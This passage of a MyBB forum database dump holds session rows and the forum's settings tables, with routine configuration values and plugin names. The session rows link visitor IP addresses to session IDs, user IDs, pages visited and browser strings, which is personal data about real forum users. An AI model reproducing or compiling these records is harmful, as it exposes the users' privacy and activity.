('2ff14684e843d235092346d0a875f16a', '0', '130.229.132.5', '1352796678', '/forumdisplay.php?fid=10', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '10', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9c073dfd873d7e128532460ce92f75a9', '0', '81.227.172.230', '1352796739', '/showthread.php?tid=1108', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '12', '1108'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cc067cddb88c8f72adf6a7906c923f94', '0', '69.171.228.249', '1352796689', '/forumdisplay.php?fid=10', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)', '0', '0', '10', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cc0e512cfd67b96adf1f2e9b942e1270', '206', '122.176.141.102', '1352801875', '/private.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('68e34dfff2ed6331aee0bffeadb46dee', '0', '91.121.169.209', '1352820493', '/misc.php?action=help&amp;hid=16', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; M', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6ffce8bfce756e743038b52c8560aed7', '0', '208.43.68.59', '1352823529', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('84285439651b5558cec5dd7b345e56d1', '0', '94.132.244.168', '1352809749', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('31bca6693f02391d950f6ef904eea613', '0', '68.59.149.142', '1352818816', '/showthread.php?tid=1121', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '20', '1121'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e2c73ca6c67df9e96e792e2df2642a5a', '61', '99.252.235.12', '1352823614', '/usercp.php?action=password', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e32e41e22cbc722c856ba0e353fb7e22', '0', '119.154.17.86', '1352820232', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c7e0cb1c209d25dc4c5cec8c3c0a168e', '0', '81.110.201.108', '1352823623', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('322e232bb8e62503bce509e0249f2ac1', '0', '165.155.212.73', '1352823661', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_settinggroups`; CREATE TABLE `mybb_settinggroups` ( `gid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(100) NOT NULL DEFAULT '', `title` varchar(220) NOT NULL DEFAULT '', `description` text NOT NULL, `disporder` smallint(5) unsigned NOT NULL DEFAULT '0', `isdefault` int(1) NOT NULL DEFAULT '0', PRIMARY KEY (`gid`) ) ENGINE=MyISAM AUTO_INCREMENT=53 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_settinggroups` WRITE; INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('1', 'calendar', 'Calendar', 'The board calendar allows the public and private listing of events and members\' birthdays. This section allows you to control and manage the settings for the Calendar.', '14', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('2', 'clickablecode', 'Clickable Smilies and BB Code', 'This section allows you to change how the clickable smilies inserter appears.', '20', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('3', 'cpprefs', 'Control Panel Preferences (Global)', 'This section allows you to set the global preferences for the Admin Control Panel.', '21', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('4', 'datetime', 'Date and Time Formats', 'Here you can specify the different date and time formats used to display dates and times on the forums.', '4', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('5', 'forumdisplay', 'Forum Display Options', 'This section allows you to manage the various settings used on the forum display (forumdisplay.php) of your boards such as enabling and disabling different features.', '6', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('6', 'forumhome', 'Forum Home Options', 'This section allows you to manage the various settings used on the forum home (index.php) of your boards such as enabling and disabling different features.', '5', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('7', 'general', 'General Configuration', 'This section contains various settings such as your board name and url, as well as your website name and url.', '2', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('8', 'mailsettings', 'Mail Settings', 'This section allows you to control various aspects of the MyBB mail system, such as sending with PHP mail or with a off server SMTP server.', '22', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('9', 'member', 'User Registration and Profile Options', 'Here you can control various settings with relation to user account registration and account management.', '8', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('10', 'memberlist', 'Member List', 'This section allows you to control various aspects of the board member listing (memberlist.php), such as how many members to show per page, and which features to enable or disable.', '10', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('11', 'onlineoffline', 'Board Online / Offline', 'These settings allow you to globally turn your forums online or offline, and allow you to specify a reason for turning them off.', '1', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('12', 'portal', 'Portal Settings', 'The portal page compiles several different pieces of information about your forum, including latest posts, who\'s online, forum stats, announcements, and more. This section has settings to control the aspects of the portal page (portal.php).', '17', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('13', 'posting', 'Posting', 'These options control the various elements in relation to posting messages on the forums.', '9', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('14', 'privatemessaging', 'Private Messaging', 'Various options with relation to the MyBB Private Messaging system (private.php) can be managed and set here.', '13', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('15', 'reputation', 'Reputation', 'The reputation system allows your users to rate others and leave a comment on the user. This section has settings to disable and change other aspects of the reputation page (reputation.php).', '10', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('16', 'search', 'Search System', 'The various settings in this group allow you to make changes to the built in search mechanism for threads and posts in MyBB.', '18', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('17', 'server', 'Server and Optimization Options', 'These options allow you to set various server and optimization preferences allowing you to reduce the load on your server, and gain better performance on your board.', '3', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('18', 'showthread', 'Show Thread Options', 'This section allows you to manage the various settings used on the thread display page (showthread.php) of your boards such as enabling and disabling different features.', '7', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('19', 'warning', 'Warning System Settings', 'The warning system allows forum staff to warn users for rule violations. Here you can manage the settings that control the warning system.', '11', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('20', 'whosonline', 'Who\'s Online', 'Various settings regarding the Who is Online functionality.', '15', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('21', 'userpruning', 'User Pruning', 'User Pruning allows you to remove users from your forum meeting certain criteria. Here you can configure that criteria.', '16', '1'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('22', 'Contact', 'Contact', 'Add a contact form to your site.', '61', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('26', 'hellban', 'Hellban Settings', 'Settings for the hellban plugin.', '0', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('27', 'g33k_welcomepm_settings', 'Welcome PM/Email', 'Settings to customize the Welcome PM/Email Plugin', '62', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('29', 'donationpage', 'Donation Page Settings', 'Set up and edit your donation page here.', '35', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('44', 'goodbyespammer', 'Goodbye Spammer Settings', 'Settings for the goodbye spammer plugin.', '28', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('35', 'ForumsRequirements', 'Forums Requirements', 'Configura plugin para mostrar mensaje de error', '0', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('36', 'strictUsername', 'Strict Username', 'Settings for plugin \"Strict Username\"', '102', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('37', 'myflood', 'MyFlood Settings', 'Settings for MyFlood.', '1', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('39', 'moderation_posts', 'Moderation Posts Count', 'Settings for the plugin.', '1', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('45', 'google_seo', 'Google SEO', 'Enable or disable the main features of Google SEO.', '103', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('46', 'google_seo_404', 'Google SEO 404', '(Advanced Users) 404 error page settings for the Google Search Engine Optimization plugin.', '104', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('47', 'google_seo_meta', 'Google SEO Meta', '(Advanced Users) Meta tag settings for the Google Search Engine Optimization plugin.', '105', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('48', 'google_seo_redirect', 'Google SEO Redirect', '(Advanced Users) Redirection settings for the Google Search Engine Optimization plugin.', '106', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('49', 'google_seo_sitemap', 'Google SEO Sitemap', '(Advanced Users) Sitemap settings for the Google Search Engine Optimization plugin.', '107', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('50', 'google_seo_url', 'Google SEO URL', '(Advanced Users) URL settings for the Google Search Engine Optimization plugin.', '108', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('51', 'courtesyedittime', 'Courtesy Edit Time Settings', 'Settings for the courtesy edit time plugin.', '28', '0'); INSERT INTO `mybb_settinggroups` (`gid`, `name`, `title`, `description`, `disporder`, `isdefault`) VALUES ('52', 'hideUntilPost_settings', 'Hides Links and Attachments until Post', 'Hides Links and Attachments until Post a Post has been made on the thread.', '50', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_settings`; CREATE TABLE `mybb_settings` ( `sid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(120) NOT NULL DEFAULT '', `title` varchar(120) NOT NULL DEFAULT '', `description` text NOT NULL, `optionscode` text NOT NULL, `value` text NOT NULL, `disporder` smallint(5) unsigned NOT NULL DEFAULT '0', `gid` smallint(5) unsigned NOT NULL DEFAULT '0', `isdefault` int(1) NOT NULL DEFAULT '0', PRIMARY KEY (`sid`) ) ENGINE=MyISAM AUTO_INCREMENT=439 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_settings` WRITE; INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('1', 'enablecalendar', 'Enable Calendar Functionality', 'If you wish to disable the calendar on your board, set this option to no.', 'yesno', '0', '1', '1', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('2', 'bbcodeinserter', 'Clickable MyCode Editor', 'Set this option to On to show the clickable code buttons editor on posting pages. Switching this off will also disable the Smilies Inserter.', 'onoff', '1', '1', '2', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('3', 'smilieinserter', 'Clickable Smilies Inserter', 'Clickable smilies will appear on the posting pages if this option is set to \'on\'.', 'onoff', '1', '1', '2', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('4', 'smilieinsertertot', 'No. of Smilies to show', 'Enter the total number of smilies to show on the clickable smilie inserter.', 'text', '20', '2', '2', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('5', 'smilieinsertercols', 'No. of Smilie Cols to Show', 'Enter the number of columns you wish to show on the clickable smilie inserter.', 'text', '4', '3', '2', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('6', 'cplanguage', 'Control Panel Language', 'The language of the control panel.', 'adminlanguage', 'english', '1', '3', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('7', 'cpstyle', 'Control Panel Style', 'The Default style that the control panel will use. Styles are inside the styles folder. A folder name inside that folder becomes the style title and style.css inside the style title folder is the css style file.', 'cpstyle', 'default', '2', '3', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('8', 'maxloginattempts', 'Max Number of Login Attempts', 'The max number of attempts to login before being locked out. Set to 0 to disable.', 'text', '5', '3', '3', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('9', 'loginattemptstimeout', 'Login Attempts Timeout', 'If the person trying to login reaches the max number of attempts, how long should they have to wait before being able to login again? (Set in minutes)', 'text', '15', '4', '3', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('10', 'dateformat', 'Date Format', 'The format of the dates used on the forum. This format uses the PHP date() function. We recommend not changing this unless you know what you\'re doing.', 'text', 'm-d-Y', '1', '4', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('11', 'timeformat', 'Time Format', 'The format of the times used on the forum. This format uses PHP\'s date() function. We recommend not changing this unless you know what you\'re doing.', 'text', 'h:i A', '2', '4', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('12', 'regdateformat', 'Registered Date Format', 'The format used on showthread where it shows when the user registered.', 'text', 'M Y', '3', '4', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('13', 'timezoneoffset', 'Default Timezone Offset', 'Here you can set the default timezone offset for guests and members using the default offset.', 'php <select name=\\\"upsetting[{$setting[\'name\']}]\\\"> <option value=\\\"-12\\\" \".($setting[\'value\'] == -12?\"selected=\\\"selected\\\"\":\"\").\">GMT -12:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -12).\")</option> <option value=\\\"-11\\\" \".($setting[\'value\'] == -11?\"selected=\\\"selected\\\"\":\"\").\">GMT -11:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -11).\")</option> <option value=\\\"-10\\\" \".($setting[\'value\'] == -10?\"selected=\\\"selected\\\"\":\"\").\">GMT -10:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -10).\")</option> <option value=\\\"-9\\\" \".($setting[\'value\'] == -9?\"selected=\\\"selected\\\"\":\"\").\">GMT -9:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -9).\")</option> <option value=\\\"-8\\\" \".($setting[\'value\'] == -8?\"selected=\\\"selected\\\"\":\"\").\">GMT -8:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -8).\")</option> <option value=\\\"-7\\\" \".($setting[\'value\'] == -7?\"selected=\\\"selected\\\"\":\"\").\">GMT -7:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -7).\")</option> <option value=\\\"-6\\\" \".($setting[\'value\'] == -6?\"selected=\\\"selected\\\"\":\"\").\">GMT -6:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -6).\")</option> <option value=\\\"-5\\\" \".($setting[\'value\'] == -5?\"selected=\\\"selected\\\"\":\"\").\">GMT -5:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -5).\")</option> <option value=\\\"-4\\\" \".($setting[\'value\'] == -4?\"selected=\\\"selected\\\"\":\"\").\">GMT -4:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -4).\")</option> <option value=\\\"-3.5\\\" \".($setting[\'value\'] == -3.5?\"selected=\\\"selected\\\"\":\"\").\">GMT -3:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -3.5).\")</option> <option value=\\\"-3\\\" \".($setting[\'value\'] == -3?\"selected=\\\"selected\\\"\":\"\").\">GMT -3:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -3).\")</option> <option value=\\\"-2\\\" \".($setting[\'value\'] == -2?\"selected=\\\"selected\\\"\":\"\").\">GMT -2:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -2).\")</option> <option value=\\\"-1\\\" \".($setting[\'value\'] == -1?\"selected=\\\"selected\\\"\":\"\").\">GMT -1:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -1).\")</option> <option value=\\\"0\\\" \".($setting[\'value\'] == 0?\"selected=\\\"selected\\\"\":\"\").\">GMT (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 0).\")</option> <option value=\\\"+1\\\" \".($setting[\'value\'] == 1?\"selected=\\\"selected\\\"\":\"\").\">GMT +1:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 1).\")</option> <option value=\\\"+2\\\" \".($setting[\'value\'] == 2?\"selected=\\\"selected\\\"\":\"\").\">GMT +2:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 2).\")</option> <option value=\\\"+3\\\" \".($setting[\'value\'] == 3?\"selected=\\\"selected\\\"\":\"\").\">GMT +3:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 3).\")</option> <option value=\\\"+3.5\\\" \".($setting[\'value\'] == 3.5?\"selected=\\\"selected\\\"\":\"\").\">GMT +3:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 3.5).\")</option> <option value=\\\"+4\\\" \".($setting[\'value\'] == 4?\"selected=\\\"selected\\\"\":\"\").\">GMT +4:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 4).\")</option> <option value=\\\"+4.5\\\" \".($setting[\'value\'] == 4.5?\"selected=\\\"selected\\\"\":\"\").\">GMT +4:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 4.5).\")</option> <option value=\\\"+5\\\" \".($setting[\'value\'] == 5?\"selected=\\\"selected\\\"\":\"\").\">GMT +5:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 5).\")</option> <option value=\\\"+5.5\\\" \".($setting[\'value\'] == 5.5?\"selected=\\\"selected\\\"\":\"\").\">GMT +5:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 5.5).\")</option> <option value=\\\"+5.75\\\" \".($setting[\'value\'] == 5.75?\"selected=\\\"selected\\\"\":\"\").\">GMT +5:45 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 5.75).\")</option> <option value=\\\"+6\\\" \".($setting[\'value\'] == 9?\"selected=\\\"selected\\\"\":\"\").\">GMT +6:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 6).\")</option> <option value=\\\"+7\\\" \".($setting[\'value\'] == 7?\"selected=\\\"selected\\\"\":\"\").\">GMT +7:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 7).\")</option> <option value=\\\"+8\\\" \".($setting[\'value\'] == 8?\"selected=\\\"selected\\\"\":\"\").\">GMT +8:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 8).\")</option> <option value=\\\"+9\\\" \".($setting[\'value\'] == 9?\"selected=\\\"selected\\\"\":\"\").\">GMT +9:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 9).\")</option> <option value=\\\"+9.5\\\" \".($setting[\'value\'] == 9.5?\"selected=\\\"selected\\\"\":\"\").\">GMT +9:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 9.5).\")</option> <option value=\\\"+10\\\" \".($setting[\'value\'] == 10?\"selected=\\\"selected\\\"\":\"\").\">GMT +10:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 10).\")</option> <option value=\\\"+10.5\\\" \".($setting[\'value\'] == 10.5?\"selected=\\\"selected\\\"\":\"\").\">GMT +10:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 10.5).\")</option> <option value=\\\"+11\\\" \".($setting[\'value\'] == 11?\"selected=\\\"selected\\\"\":\"\").\">GMT +11:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 11).\")</option> <option value=\\\"+12\\\" \".($setting[\'value\'] == 12?\"selected=\\\"selected\\\"\":\"\").\">GMT +12:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 12).\")</option> </select>', '-4', '4', '4', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('14', 'dstcorrection', 'Day Light Savings Time', 'If times are an hour out above and your timezone is selected correctly, enable day light savings time correction.', 'yesno', '0', '5', '4', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('15', 'threadsperpage', 'Threads Per Page', 'The number of threads to display per page on the forum display', 'text', '15', '1', '5', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('16', 'hottopic', 'Replies For Hot Topic', 'The number of replies that is needed for a topic to be considered \'hot\'.', 'text', '20', '2', '5', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('17', 'hottopicviews', 'Views For Hot Topic', 'The number of views a thread can have before it is considered \'hot\'.', 'text', '150', '3', '5', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('18', 'usertppoptions', 'User Selectable Threads Per Page', 'If you would like to allow users to select how many threads per page are shown in a forum, enter the options they should be able to select separated with commas. If this is left blank they will not be able to choose how many threads are shown per page.', 'text', '10,20,25,30,40,50', '4', '5', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('19', 'dotfolders', 'Use \'dot\' Icons', 'Do you want to show dots on the thread indicators of threads users have participated in.', 'yesno', '0', '5', '5', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('20', 'allowthreadratings', 'Use Thread Ratings?', 'Allow users to rate threads?', 'yesno', '0', '6', '5', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('21', 'browsingthisforum', 'Users Browsing this Forum', 'Here you can turn off the \'users browsing this forum\' feature.', 'onoff', '0', '7', '5', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('22', 'announcementlimit', 'Announcements Limit', 'The number of forum announcements to show in the thread listing on the forum display pages. Set to 0 to disable announcements altogether.', 'text', '5', '8', '5', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('23', 'readparentforums', 'Attempt to Mark Parent Forums as Read', 'When set to yes, this setting will attempt to mark the parent forums of a sub-forum as read if there are no more unread posts. Please note that this setting can lead to a decrease in performance and multiple database queries and therefore must be treated as experimental. See the <a href=\"http://wiki.mybb.com/index.php/1.6.5\">MyBB Wiki</a> for more information regarding this change.', 'yesno', '0', '9', '5', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('24', 'showdescriptions', 'Show Forum Descriptions?', 'This option will allow you to turn off showing the descriptions for forums.', 'yesno', '1', '1', '6', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('25', 'subforumsindex', 'Subforums to show on Index listing', 'The number of subforums that you wish to show inside forums on the index and forumdisplay pages. Set to 0 to not show the subforum list', 'text', '4', '2', '6', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('26', 'subforumsstatusicons', 'Show Subforum Status Icons?', 'Show icons indicating whether or not a subforum contains new posts or not? This won\'t have any effect unless you enabled subforums display on the index.', 'yesno', '1', '3', '6', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('27', 'hideprivateforums', 'Hide Private Forums?', 'You can hide private forums by turning this option on. This option also hides forums on the forum jump and all subforums.', 'yesno', '1', '4', '6', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('28', 'modlist', 'Forums\' Moderator Listing', 'Here you can turn on or off the listing of moderators for each forum on index.php and forumdisplay.php', 'onoff', '1', '5', '6', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('29', 'showbirthdays', 'Show Today\'s Birthdays?', 'Do you want to show today\'s birthdays on the forum homepage?', 'yesno', '0', '6', '6', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('30', 'showbirthdayspostlimit', 'Only Show Birthdays with x Posts', 